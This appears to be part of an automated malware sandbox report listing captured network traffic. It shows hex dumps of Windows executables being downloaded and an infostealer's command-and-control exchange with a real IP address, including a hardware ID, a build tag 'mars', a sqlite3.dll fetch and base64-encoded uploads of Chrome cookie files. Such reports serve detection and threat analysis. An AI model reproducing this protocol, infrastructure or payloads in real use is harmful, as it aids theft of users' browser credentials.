Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:36:41 GMTContent-Type: application/octet-streamContent-Length: 923136Last-Modified: Fri, 22 Nov 2024 19:31:16 GMTConnection: keep-aliveETag: "6740dc04-e1600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fb db 40 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 66 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 32 d8 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 d8 ab 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 ab 00 00 00 40 0d 00 00 ac 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 a0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:36:48 GMTContent-Type: application/octet-streamContent-Length: 2819584Last-Modified: Fri, 22 Nov 2024 19:31:41 GMTConnection: keep-aliveETag: "6740dc1d-2b0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 57 d5 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6a 61 6a 65 79 72 68 79 00 c0 2a 00 00 a0 00 00 00 a6 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 71 73 6b 66 66 71 6f 00 20 00 00 00 60 2b 00 00 04 00 00 00 e0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 e4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:36:59 GMTContent-Type: application/octet-streamContent-Length: 2819584Last-Modified: Fri, 22 Nov 2024 19:31:44 GMTConnection: keep-aliveETag: "6740dc20-2b0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 57 d5 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6a 61 6a 65 79 72 68 79 00 c0 2a 00 00 a0 00 00 00 a6 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 71 73 6b 66 66 71 6f 00 20 00 00 00 60 2b 00 00 04 00 00 00 e0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 e4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:37:15 GMTContent-Type: application/octet-streamContent-Length: 2819584Last-Modified: Fri, 22 Nov 2024 19:31:44 GMTConnection: keep-aliveETag: "6740dc20-2b0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 57 d5 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6a 61 6a 65 79 72 68 79 00 c0 2a 00 00 a0 00 00 00 a6 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 71 73 6b 66 66 71 6f 00 20 00 00 00 60 2b 00 00 04 00 00 00 e0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 e4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 38 37 42 34 42 30 35 45 33 46 33 32 33 35 31 31 34 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 2d 2d 0d 0a Data Ascii: ------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="hwid"7687B4B05E3F3235114199------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="build"mars------EBAAFCAFCBKFHJJJKKFH--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 2d 2d 0d 0a Data Ascii: ------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="message"browsers------CAFBGDHCBAEHIDGCGIDA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="message"plugins------FCBFBGDBKJKECAAKKFHD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFBHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 2d 2d 0d 0a Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="message"fplugins------KFCFBFHIEBKJKFHIEBFB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAEHCAEGDHJKFHJKFIJHost: 185.215.113.206Content-Length: 6707Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------CGHCFBAAAFHJDGCBFIIJ--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJEHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKKKFBGDHJKFHJJJJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 2d 2d 0d 0a Data Ascii: ------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="file"------GDBAKKKFBGDHJKFHJJJJ--
